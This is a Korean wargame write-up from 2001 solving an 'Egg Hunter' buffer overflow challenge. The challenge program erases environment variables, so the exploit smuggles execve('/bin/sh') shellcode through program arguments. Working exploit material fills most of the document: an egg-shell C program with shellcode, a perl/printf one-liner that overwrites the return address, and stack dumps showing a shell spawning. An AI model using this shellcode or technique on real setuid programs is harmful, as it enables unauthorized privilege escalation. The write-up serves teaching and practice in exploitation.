             ========================================================
                         "Buffer OverFlow Bonus 문제"
                                2001/ 07/ 31
                         NaNu9 , adeespee@hotmail.com
             ========================================================


0. 기본 개념.

  지금까지 풀어온 문제의 유형을 보면 일반적으로 Egg Shell Code를 만들어
  memcpy(egg,"EGG=",4); 이 문장을 이용하여 환경변수의 이름을 붙이고
  putenv(egg); Put Environment를 이용하여 환경변수로 설정하여
  STACK 영역에 Egg Shell Code, Egg Shell Code Vector(Pointer)를 보관해놓고
  RET 번지를 이곳으로 가도록 조작 변경하는 방법을 사용했습니다.

  해킹기술이 발전하면 보안도 발전하는법.
  문제를 푸는 방법이 발전하면 문제도 발전하는법.

  그런데 일반적인 이 방법을 완전히 뿌숴버리는 강력한 문제가 나왔으니
  그이름 "Egg Hunter"  --> 처음봤을때 황당함!!!

  이 프로그램이 실행되면 감춰놓은 Egg Shell Code, Egg Shell Code Vector, 등등...
  모조리 지워버리고 입력을 요구합니다.

  그러므로 지금까지의 공격방법에서 한차원 높은 지식을 요구하는 것입니다.

  방법이 없을까요???
  해킹은 영원하다!!!
  저는 이렇게 생각합니다.

  여러분들도 지금까지 여러가지의 문제를 풀어오면서
  STACK 영역을 많이 Dump 해본 경험이 있으신 분들은 STACK 영역의 구조를
  어느정도는 아실것이라 생각합니다.

  Linux 개별 Processor는
  (IA32 Kernel 2.2.xx에서는 Processor당 4G Byte 활당)
  사용자별로 Shell Program(/bin/sh : 컴퓨터와 사용자 InterFace)이 활당되고 
  그 Shell 프로그램이 관리하는 사용자의 기본정보가 
  STACK 영역 제일 뒷부분에 환경변수로 있고,
  그 위에 사용자 명령을 분석 실행하는 영역이 있으며
  그 위에 일반적으로 실행된 프로그램을 분석해보는 RET 번지가 있습니다.
  (세부적인것은 저도 잘 모릅니다.)

  이 문제를 풀어보는 방법은 지금까지의 일반적인 방법과 마찮가지로
  STACK 영역의 가장 뒷 부분에 있는 환경변수 영역에
  Egg Shell Code를 만들어 놓았다가

  이 프로그램을 실행할때 프로그램의 실행변수(Argument)로 설정해 주므로써
  Shell(/bin/sh)로 하여금 Egg Shell Code를 복사하여
  환경변수 영역보다 조금 위에 Argument로 존재하도록 하여

  이 프로그램에서 환경변수를 모두 지워버려도
  다른곳에서 여전히 존재하고 있는 방법입니다.

  또 다른 방법은
  hackerleon님이 힌트를 주신 방법(감사 합니다.)으로
  프로그램의 실행시 Argument로 직접 Egg Shell Code를 넣어주는 방법입니다.

  다른 방법도 있겠지만 이 2 가지를 예를들어 설명을 하겠습니다.
  서론이 너무 길은것 같습니다.


1. 문제 풀이.

  가장 중요한것은 문제를 확실하게 이해를 하고
  프로그램의 동작을 정확하게 파악 하는 것입니다.  --> 아무리 강조해도...

  기본적인 문제에서 주석을 달고 분석을 해보겠습니다.

  [null2root@Hacker NaNu9]$ vi bonus.c

  #include <stdio.h>

  extern char **environ;        // 환경변수를 가르키는 포인트 변수

  main()
  {
    int egghunter;              // 환경변수를 지우기 위한 카운트
    char *jmp;                  // over의 내용을 써넣을 포인트
    char over[4];               // 입력한 내용이 저장되는 곳

    for(egghunter=0; environ[egghunter]; egghunter++)  // 환경변수를 카운트
      memset(environ[egghunter], 0, strlen(environ[egghunter])); // 환경변수를 지워버림
                                // 환경변수 영역이 깨끗하게 지워짐.
    setuid(999,999);            // 권한을 부여함
    printf("Hi, input everything....but only 4bytes :\n"); // 입력하는 내용에 대하여 알림
    printf("==> ");             // 입력 Prompt
    fgets(over, 9, stdin);      // 입력한 내용을 메모리로 가져감.

    printf("\n");               // 입력된 내용을 표시하기 위하여 줄을 바꿈.
    printf("your input-value : %s\n", over);  // 입력된 내용을 알림
    strncpy(jmp, over, 4);      // 입력한 내용을 처리함
  }

  이 프로그램의 흐름을 표현하면
  환경변수를 모두 지우고 권한을 부여한뒤에 입력을 알림니다.

  사용자가 데이터를 입력하면 9 Byte를 입력합니다.
  여기에서 over[4]가 OverFlow 합니다.

  그리고 입력된 데이터를 확인 표시합니다.
  그리고 입력한 데이터를 jmp가 가르키는 곳에 저장합니다.
  설명은 간단한것 같습니다만...


  이 프로그램은 3 곳을 이해하면 될것 같습니다.

  첫째는 환경변수를 지우는 것 입니다.

   우리는 지금까지 환경변수를 설정하는 것에 대하여 프로그램을 해왔습니다.
   그런데 여기서 부터는 이 생각을 싹 지우는 것 입니다.
   따라서 지금 부터는 꼭 환경변수 설정만이 방법은 아니다.
   라는 개념으로 생각을 바꾸는 것입니다.

  둘째는 "fgets(over, 9, stdin); // 입력한 내용을 메모리로 가져감" 입니다.

   자연스럽게 내용을 9 Byte 만 입력하는 것으로 표현되어 있지만
   사실은 over[]이 4 Byte만 활당되어 있으므로
   여기에서 Buffer OverFlow가 발생하여 *jmp의 포인터를 설정하는 것입니다.

  셋째는 "strncpy(jmp, over, 4); // 입력한 내용을 처리함" 입니다.

   무심히 보면 over[4]의 내용을 그냥 보관하는것 처럼 보이지만
   *jmp가 가르키는 곳이 이 프로그램의 RET 번지이며
   over[4]의 내용이 RET 번지를 바꿀 내용이라는 것입니다.

  엄청난 프로그램 아닙니까!!!

  정말인지 다음은 프로그램의 동작을 확인해 보겠습니다.


2. 프로그램의 동작분석

  기본적인 프로그램에서 동작내용을 분석하기 위한 프로그램을 몇줄 추가해서
  프로그램에 주석을 달아 보겠습니다.


  [null2root@Hacker NaNu9]$ vi bonus.c

  #include <stdio.h>
  #include "dumpcode.h"     // 내용을 보기위해서 기본적으로 추가함.

  extern char **environ;        // 환경변수를 가르키는 포인트 변수

  unsigned long get_esp(void)   // STACK 영역을 전부 Dump 시키기 위해
  {
    __asm__("movl %esp,%eax");  // 현재 Stack Pointer내용(esp)을 가져옴
  }

  main()
  {
    int egghunter;              // 환경변수를 지우기 위한 카운트
    char *jmp;                  // over의 내용을 써넣을 포인트
    char over[4];               // 입력한 내용이 저장되는 곳

    printf("over:0x%08x, ebp:0x%08x, RET:0x%08x  \n",   // 변수의 실제 번지 확인용
        &over, over+12, over+16);       // GCC의 Version에 따라서 차이가 남니다.

//    dumpcode((char *)over-16, 128);     // STACK 내용을 보고 싶을때
//    dumpcode((char *)&**environ, 1024); // 환경변수의 내용을 지우기 전에 보고자 할경우.

    for(egghunter=0; environ[egghunter]; egghunter++)  // 환경변수를 카운트
      memset(environ[egghunter], 0, strlen(environ[egghunter])); // 환경변수를 지워버림
                                // 환경변수 영역이 깨끗하게 지워짐.
//    dumpcode((char *)&**environ,64);            // 정말로 지워졌는지 궁금하시면...

    setuid(999,999);            // 권한을 부여함
    printf("Hi, input everything....but only 4bytes :\n"); // 입력하는 내용에 대하여 알림
    printf("==> ");             // 입력 Prompt
    fgets(over, 9, stdin);      // 입력한 내용을 메모리로 가져감.

//    egghunter = get_esp() & 0xfffffffc;   // 현재 Stack Pointer의 내용을 가져옴
//    dumpcode((char *)over-16, (egghunter|0xffff)-egghunter);
                                            // STACK 영역을 모두 표시
//  예를 들어 Stack Pointer가 0xbfff1234일경우
//  (0xbfff1234 | 0xffff) 를 하니까 0xbfffffff 로 Stack의 가장 끝부분을 가르킴
//  현재 사용중인 STACK 의 크기 = 0xbfffffff - 현재 Stack Pointer 값
//  따라서 현재 사용중인 STACK 영역을 모두 Dump 표시 한다.

    dumpcode((char *)over-16, 768);     // 이 프로그램에서 사용중인 STACK과
                                        // Argument의 내용을 볼수 있다.

    printf("\n");               // 입력된 내용을 표시하기 위하여 줄을 바꿈.
    printf("your input-value : %s\n", over);  // 입력된 내용을 알림
    strncpy(jmp, over, 4);      // 입력한 내용을 처리함

    dumpcode((char *)over-16, 128);     // RET 번지가 정말로 바뀌었나?
  }

  주로 내용을 표시하도록 프로그램을 추가 했습니다.


3. 메모리의 구조분석

  다음은 동작시 메모리의 상태를 확인해 보겠습니다.

  프로그램 컴파일 하여 실행 File로 만들어 보겠습니다.

  [null2root@Hacker NaNu9]$ gcc bonus.c -o bc  --> 컴파일
  Error없이 Compile이 완료되었습니다.

  프로그램을 실행하면서 임의의 데이터를 입력하여
  동작된 메모리 구조를 분석해 보겠습니다.

  [null2root@Hacker NaNu9]$ ./bc  -->  Bonus Complete

  over:0x7ffffb5c, ebp:0x7ffffb68, RET:0x7ffffb6c  --> // 변수의 실제 번지 확인용

  Hi, input everything....but only 4bytes :        --> // 입력하는 내용에 대하여 알림

  ==> 1234567890        --> 동작상태를 분석하기 위하여 임의로 입력

  0x7ffffb4c  68 fb ff 7f 88 88 04 08 4c fb ff 7f 00 03 00 00   h.......L.......
  0x7ffffb5c  31 32 33 34 35 36 37 38 00 00 00 00 88 fb ff 7f   12345678........
  0x7ffffb6c  13 d2 ad 2a 01 00 00 00 b4 fb ff 7f bc fb ff 7f   ...*............
  0x7ffffb7c  24 e9 ab 2a 01 00 00 00 20 85 04 08 00 00 00 00   $..*.... .......
  0x7ffffb8c  41 85 04 08 b4 87 04 08 01 00 00 00 b4 fb ff 7f   A...............
  0x7ffffb9c  38 84 04 08 0c 89 04 08 f0 5a ab 2a ac fb ff 7f   8........Z.*....
  0x7ffffbac  70 ef ab 2a 01 00 00 00 a7 fc ff 7f 00 00 00 00   p..*............
  0x7ffffbbc  ac fc ff 7f c5 fc ff 7f d3 fc ff 7f e9 fc ff 7f   ................
  0x7ffffbcc  f7 fc ff 7f 09 fd ff 7f 20 fd ff 7f 3b fd ff 7f   ........ ...;...
  0x7ffffbdc  45 fd ff 7f 53 fd ff 7f 92 fd ff 7f a2 fd ff 7f   E...S...........
  0x7ffffbec  b3 fd ff 7f c8 fd ff 7f d8 fd ff 7f ea fd ff 7f   ................
  0x7ffffbfc  f5 fd ff 7f fd fd ff 7f 0a fe ff 7f 12 fe ff 7f   ................
  0x7ffffc0c  f0 ff ff 7f 00 00 00 00 03 00 00 00 34 80 04 08   ............4...
  0x7ffffc1c  04 00 00 00 20 00 00 00 05 00 00 00 06 00 00 00   .... ...........
  0x7ffffc2c  06 00 00 00 00 10 00 00 07 00 00 00 00 b0 aa 2a   ...............*
  0x7ffffc3c  08 00 00 00 00 00 00 00 09 00 00 00 20 85 04 08   ............ ...
  0x7ffffc4c  0b 00 00 00 1d 0c 00 00 0c 00 00 00 1d 0c 00 00   ................
  0x7ffffc5c  0d 00 00 00 1d 0c 00 00 0e 00 00 00 1d 0c 00 00   ................
  0x7ffffc6c  10 00 00 00 ff f9 c7 c1 0f 00 00 00 a2 fc ff 7f   ................
  0x7ffffc7c  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
  0x7ffffc8c  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
  0x7ffffc9c  00 00 00 00 00 00 69 36 38 36 00 2e 2f 62 63 00   ......i686../bc.
  0x7ffffcac  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

  < Clear 된 내용으로 생략>

  0x7ffffe2c  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
  0x7ffffe3c  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

  -->  dumpcode((char *)over-16, 768); // 이 프로그램에서 출력

  your input-value : 12345678  -->     // 입력된 내용을 알림

  Segmentation fault

  [null2root@Hacker NaNu9]$ 

  이상이 실제 프로그램이 동작하면서 출력한 내용입니다.
  이것을 분석해보겠습니다.

     변수명     크기       활당된 주소    동작시 내용

    over          4 Byte   0x7ffffb5c     직접 입력한 데이타(1234)
    *jmp          4 Byte   0x7ffffb60     직접 입력한 데이타(5678)
   egghunter      4 Byte   0x7ffffb64     00 00 00 00
     ebp          4 Byte   0x7ffffb68     88 fb ff 7f
     RET          4 Byte   0x7ffffb6c     13 d2 ad 2a

  이후의 내용에 대해서는 잘 모릅니다만 이 프로그램에서 필요한 부분은
  str[4]와 *jmp 변수입니다.

  그래서 이들 변수를 기준으로 데이터가 입력되는 상태를 표시하면

  <낮은 번지>                                         <높은 번지>
  over,        *jmp         egghunter    ebp,         RET
  [4 byte]     [4 byte]     [4 byte]     [4 byte]     [4 byte]
  [1234]       [5678]       [0x00000000] [0x7ffffb88] [0x2aadd213]

  이렇게 입력됩니다.

  그러므로 over[4]에 Egg Shell이 있는 번지를 입력하고
  *jmp에 RET 번지를 입력하면

  strncpy(jmp, over, 4); // jmp가 지정한 번지에 over[4]의 내용을 복사함

  에서 프로그램을 끝내고 돌아갈 RET 번지를 변경하게 됩니다.

  다음은 실제 프로그램으로 동작되는 상태를 분석해 보겠습니다.


4. Egg Shell을 이용한 방법.

  먼저 일반적으로 사용해왔던 Egg Shell을 이용한 방법입니다.

  흔히 볼수있는 Egg Shell Program에서 Offset 번지 계산할 필요도 없고
  또 RET 환경변수 부분도 제거한 상태라고 생각하면 될것 같습니다.

  [null2root@Hacker NaNu9]$ cat > egg.c

  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>
  #include <string.h>

  #define DEFAULT_EGG_SIZE        256
  #define NOP                    0x90

  char shellcode[] = 
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  int main(int argc, char *argv[])
  {
    char *buff, *ptr, *egg;
    int *aptr, addr, i;
    int esize=DEFAULT_EGG_SIZE;

    if (!(egg = malloc(esize))) {             // Egg Shell용 Buffer
      printf("Can't allocate memory.\n");
      exit(0);
    }

    ptr = egg;                                // Egg Shell을 만듬
    for (i = 0; i < esize - strlen(shellcode) - 1; i++) *(ptr++) = NOP;
    for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
    egg[esize - 1] = '\0';

    memcpy(egg,"EGG=",4);       // EGG라는 환경변수 설정
    putenv(egg);

    system("/bin/bash");        // Shell 실행
  }

  Egg Shell Program도 비교적 간단합니다.
  프로그램 컴파일 하여 실행 File로 만들어 보겠습니다.

  [null2root@Hacker NaNu9]$ gcc egg.c -o egg  --> 컴파일
  Error없이 Compile이 완료되었습니다.

  프로그램을 실행하여 Egg Shell을 환경변수로 만들어 놓습니다.
  [null2root@Hacker NaNu9]$ ./egg             --> 아무런 조건 없이 실행

  다음은 Egg Hunter Program을 다음과 같이 실행 합니다.

  [null2root@Hacker NaNu9]$ (printf "\x1c\xfb\xff\x7f\x7c\xf9\xff\x7f";cat)|./bc $EGG

  실행한 결과 입니다.

  over:0x7ffff96c, ebp:0x7ffff978, RET:0x7ffff97c  --> RET 번지 참고

  Hi, input everything....but only 4bytes :
  ==> 

  RET 번지가 바뀌기 전의 메모리 상태 입니다.

  0x7ffff95c  78 f9 ff 7f 91 88 04 08 5c f9 ff 7f 00 03 00 00   x.......\.......
  0x7ffff96c  1c fb ff 7f 7c f9 ff 7f 00 00 00 00 98 f9 ff 7f   ....|...........
  0x7ffff97c  13 d2 ad 2a 02 00 00 00 c4 f9 ff 7f d0 f9 ff 7f   ...*............
  0x7ffff98c  24 e9 ab 2a 02 00 00 00 20 85 04 08 00 00 00 00   $..*.... .......
  0x7ffff99c  41 85 04 08 bc 87 04 08 02 00 00 00 c4 f9 ff 7f   A...............
  0x7ffff9ac  38 84 04 08 0c 89 04 08 f0 5a ab 2a bc f9 ff 7f   8........Z.*....
  0x7ffff9bc  70 ef ab 2a 02 00 00 00 bd fa ff 7f c2 fa ff 7f   p..*............
  0x7ffff9cc  00 00 00 00 be fb ff 7f d7 fb ff 7f e5 fb ff 7f   ................
  0x7ffff9dc  fb fb ff 7f 09 fc ff 7f 1b fc ff 7f 32 fc ff 7f   ............2...
  0x7ffff9ec  4d fc ff 7f 57 fc ff 7f 65 fc ff 7f a4 fc ff 7f   M...W...e.......
  0x7ffff9fc  b4 fc ff 7f c5 fc ff 7f da fc ff 7f ea fc ff 7f   ................
  0x7ffffa0c  f5 fc ff 7f f5 fd ff 7f fd fd ff 7f 0a fe ff 7f   ................
  0x7ffffa1c  12 fe ff 7f f0 ff ff 7f 00 00 00 00 03 00 00 00   ................
  0x7ffffa2c  34 80 04 08 04 00 00 00 20 00 00 00 05 00 00 00   4....... .......
  0x7ffffa3c  06 00 00 00 06 00 00 00 00 10 00 00 07 00 00 00   ................
  0x7ffffa4c  00 b0 aa 2a 08 00 00 00 00 00 00 00 09 00 00 00   ...*............
  0x7ffffa5c  20 85 04 08 0b 00 00 00 1d 0c 00 00 0c 00 00 00    ...............
  0x7ffffa6c  1d 0c 00 00 0d 00 00 00 1d 0c 00 00 0e 00 00 00   ................
  0x7ffffa7c  1d 0c 00 00 10 00 00 00 ff f9 c7 c1 0f 00 00 00   ................
  0x7ffffa8c  b8 fa ff 7f 00 00 00 00 00 00 00 00 00 00 00 00   ................
  0x7ffffa9c  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
  0x7ffffaac  00 00 00 00 00 00 00 00 00 00 00 00 69 36 38 36   ............i686
  0x7ffffabc  00 2e 2f 62 63 00 90 90 90 90 90 90 90 90 90 90   ../bc...........
  0x7ffffacc  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffadc  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffaec  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffafc  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffb0c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffb1c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffb2c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffb3c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffb4c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffb5c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffb6c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffb7c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffb8c  90 90 90 90 eb 1f 5e 89 76 08 31 c0 88 46 07 89   ......^.v.1..F..
  0x7ffffb9c  46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80 31 db   F......N..V...1.
  0x7ffffbac  89 d8 40 cd 80 e8 dc ff ff ff 2f 62 69 6e 2f 73   ..@......./bin/s
  0x7ffffbbc  68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   h...............

  < 0x00으로 삭제했습니다.>

  your input-value : ?|?  --> 입력 확인용 표시

  RET 번지가 바뀐상태의 메모리 내용 입니다.

  0x7ffff95c  78 f9 ff 7f d5 88 04 08 5c f9 ff 7f 80 00 00 00   x.......\.......
  0x7ffff96c  1c fb ff 7f 7c f9 ff 7f 00 00 00 00 98 f9 ff 7f   ....|...........
  0x7ffff97c  1c fb ff 7f 02 00 00 00 c4 f9 ff 7f d0 f9 ff 7f   ................
  0x7ffff98c  24 e9 ab 2a 02 00 00 00 20 85 04 08 00 00 00 00   $..*.... .......
  0x7ffff99c  41 85 04 08 bc 87 04 08 02 00 00 00 c4 f9 ff 7f   A...............
  0x7ffff9ac  38 84 04 08 0c 89 04 08 f0 5a ab 2a bc f9 ff 7f   8........Z.*....
  0x7ffff9bc  70 ef ab 2a 02 00 00 00 bd fa ff 7f c2 fa ff 7f   p..*............
  0x7ffff9cc  00 00 00 00 be fb ff 7f d7 fb ff 7f e5 fb ff 7f   ................

  ps    -->  야호!!! 성공이닷...
    PID TTY          TIME CMD
  25440 pts/18   00:00:00 bash
    479 pts/18   00:00:00 egg    --> Egg Shell Program이 실행되어 있습니다.
    480 pts/18   00:00:00 bash
    647 pts/18   00:00:00 bash
    648 pts/18   00:00:00 sh     --> Argument로 입력한 /bin/sh가 실행됨.
    650 pts/18   00:00:00 cat
    653 pts/18   00:00:00 ps
  exit

  [null2root@Hacker NaNu9]$ 

  이상이 Egg Shell프로그램을 실행한 상태에서 실제 프로그램
  Egg Hunter가 동작하면서 출력한 내용입니다.

  이것을 분석해보겠습니다.

     변수명     크기       활당된 주소    동작시 내용

    over          4 Byte   0x7ffff96c     직접 입력한 데이타(0x7ffffb1c)
    *jmp          4 Byte   0x7ffff970     직접 입력한 데이타(0x7ffff97c)
   egghunter      4 Byte   0x7ffff974     00 00 00 00
     ebp          4 Byte   0x7ffff978     98 f9 ff 7f  --> 변경 없슴
     RET          4 Byte   0x7ffff97c     13 d2 ad 2a  --> 1c fb ff 7f

  이후의 내용에 대해서는 잘 모릅니다만 이 프로그램에서 동작한 내용을
  대부분 표시해놓았습니다.
  참고로 한번 보시기 바랍니다.

  0x7ffffaac  00 00 00 00 00 00 00 00 00 00 00 00 69 36 38 36   ............i686
  0x7ffffabc  00 2e 2f 62 63 00 90 90 90 90 90 90 90 90 90 90   ../bc...........

  이곳이 사용자 명령이 입력된 곳입니다.
  ./bc 이후부터 /bin/sh까지가 Argument 부분입니다.

  그리고 아래의 /bin/sh 00 이후의 0x00으로 지워진 부분이 환경변수가 있던곳 입니다.

  0x7ffffbac  89 d8 40 cd 80 e8 dc ff ff ff 2f 62 69 6e 2f 73   ..@......./bin/s
  0x7ffffbbc  68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   h...............

  실제 프로그램을 실행해 보면 더 많은 출력이 있습니다만
  같은 내용이라서 삭제했습니다..


5. 프로그램의 실행시 Argument로 직접 Egg Shell Code를 넣어주는 방법입니다.

  이 방법은 게시판의 글을 참고로 하여 실행시켜본 내용입니다.

  [null2root@Hacker NaNu9]$ (printf "\x1c\xfc\xff\x7f\x5c\xfa\xff\x7f";cat)|(pe
  rl -e 'system "./bc","\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
  0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
  \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
  x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
  90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
  0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
  \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
  x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
  90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
  0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
  \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
  x90\x90\x90\x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x
  0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd
  c\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00"')

  다음은 실행한 결과 입니다.

  over:0x7ffffa4c, ebp:0x7ffffa58, RET:0x7ffffa5c  --> RET 번지 참고

  Hi, input everything....but only 4bytes :
  ==> 

  RET 번지가 바뀌기 전의 메모리 상태 입니다.

  0x7ffffa3c  58 fa ff 7f 6e 88 04 08 3c fa ff 7f 00 04 00 00   X...n...<.......
  0x7ffffa4c  1c fc ff 7f 5c fa ff 7f 00 00 00 00 78 fa ff 7f   ....\.......x...
  0x7ffffa5c  13 d2 ad 2a 02 00 00 00 a4 fa ff 7f b0 fa ff 7f   ...*............
  0x7ffffa6c  24 e9 ab 2a 02 00 00 00 20 85 04 08 00 00 00 00   $..*.... .......
  0x7ffffa7c  41 85 04 08 b4 87 04 08 02 00 00 00 a4 fa ff 7f   A...............
  0x7ffffa8c  38 84 04 08 cc 88 04 08 f0 5a ab 2a 9c fa ff 7f   8........Z.*....
  0x7ffffa9c  70 ef ab 2a 02 00 00 00 9e fb ff 7f a3 fb ff 7f   p..*............
  0x7ffffaac  00 00 00 00 a3 fc ff 7f bc fc ff 7f ca fc ff 7f   ................
  0x7ffffabc  e0 fc ff 7f ee fc ff 7f 00 fd ff 7f 17 fd ff 7f   ................
  0x7ffffacc  32 fd ff 7f 3c fd ff 7f 4a fd ff 7f 89 fd ff 7f   2...<...J.......
  0x7ffffadc  99 fd ff 7f aa fd ff 7f bf fd ff 7f cf fd ff 7f   ................
  0x7ffffaec  e1 fd ff 7f ec fd ff 7f f4 fd ff 7f 01 fe ff 7f   ................
  0x7ffffafc  09 fe ff 7f e7 ff ff 7f 00 00 00 00 03 00 00 00   ................
  0x7ffffb0c  34 80 04 08 04 00 00 00 20 00 00 00 05 00 00 00   4....... .......
  0x7ffffb1c  06 00 00 00 06 00 00 00 00 10 00 00 07 00 00 00   ................
  0x7ffffb2c  00 b0 aa 2a 08 00 00 00 00 00 00 00 09 00 00 00   ...*............
  0x7ffffb3c  20 85 04 08 0b 00 00 00 1d 0c 00 00 0c 00 00 00    ...............
  0x7ffffb4c  1d 0c 00 00 0d 00 00 00 1d 0c 00 00 0e 00 00 00   ................
  0x7ffffb5c  1d 0c 00 00 10 00 00 00 ff f9 c7 c1 0f 00 00 00   ................
  0x7ffffb6c  99 fb ff 7f 00 00 00 00 00 00 00 00 00 00 00 00   ................
  0x7ffffb7c  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
  0x7ffffb8c  00 00 00 00 00 00 00 00 00 00 00 00 00 69 36 38   .............i68
  0x7ffffb9c  36 00 2e 2f 62 63 00 90 90 90 90 90 90 90 90 90   6../bc..........
  0x7ffffbac  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffbbc  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffbcc  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffbdc  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffbec  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffbfc  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffc0c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffc1c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffc2c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffc3c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffc4c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffc5c  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
  0x7ffffc6c  90 90 90 90 90 90 90 90 90 eb 1f 5e 89 76 08 31   ...........^.v.1
  0x7ffffc7c  c0 88 46 07 89 46 0c b0 0b 89 f3 8d 4e 08 8d 56   ..F..F......N..V
  0x7ffffc8c  0c cd 80 31 db 89 d8 40 cd 80 e8 dc ff ff ff 2f   ...1...@......./
  0x7ffffc9c  62 69 6e 2f 73 68 00 00 00 00 00 00 00 00 00 00   bin/sh..........
  0x7ffffcac  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

  < 0x00으로 삭제했습니다.>

  your input-value : ?|?  --> 입력 확인용 표시

  RET 번지가 바뀐상태의 메모리 내용 입니다.

  0x7ffffa3c  58 fa ff 7f 94 88 04 08 3c fa ff 7f 80 00 00 00   X.......<.......
  0x7ffffa4c  1c fc ff 7f 5c fa ff 7f 00 00 00 00 78 fa ff 7f   ....\.......x...
  0x7ffffa5c  1c fc ff 7f 02 00 00 00 a4 fa ff 7f b0 fa ff 7f   ................
  0x7ffffa6c  24 e9 ab 2a 02 00 00 00 20 85 04 08 00 00 00 00   $..*.... .......
  0x7ffffa7c  41 85 04 08 b4 87 04 08 02 00 00 00 a4 fa ff 7f   A...............
  0x7ffffa8c  38 84 04 08 cc 88 04 08 f0 5a ab 2a 9c fa ff 7f   8........Z.*....
  0x7ffffa9c  70 ef ab 2a 02 00 00 00 9e fb ff 7f a3 fb ff 7f   p..*............
  0x7ffffaac  00 00 00 00 a3 fc ff 7f bc fc ff 7f ca fc ff 7f   ................

  ps    -->  음.. 역시 되는구먼...
    PID TTY          TIME CMD
  25440 pts/18   00:00:00 bash
  29929 pts/18   00:00:00 bash
  29930 pts/18   00:00:00 perl  --> perl 프로그램이 동작되어 있음.
  29932 pts/18   00:00:00 cat
  29933 pts/18   00:00:00 sh    --> Argument로 입력한 /bin/sh이 실행됨.
  29939 pts/18   00:00:00 ps
  exit

  [null2root@Hacker NaNu9]$ 

  이상이 프로그램의 실행시 Argument로 직접 Egg Shell Code를 넣어주는 방법을
  실행한 상태에서 실제 프로그램 Egg Hunter가 동작하면서 출력한 내용입니다.

  4.의 내용과 동작은 거의 비슷한듯 합니다.


6. 정리를 해보겠습니다.

  가장 큰 결실은 역시 Egg Shell을 사용하지 않고 Argument를 사용하는 방법입니다.

  이 Argument는 Egg Hunter가 사용을 하든지 않든지 그것은 상관이 없습니다.
  /bin/bash가 만들어 주는 곳이기 때문입니다.

  그러므로 이곳에 무한(???)한 Egg Shell Code를 넣을수 있지 않을까 합니다.

  둘째는 프로그램이 동작하는 상태를 보다 깊이 알수있었다는 것입니다.

  STACK 영역을 거의 전부 Dump 시켜보므로써 잘은 몰라도
  대충의 흐름은 파악이 되는것 같습니다.

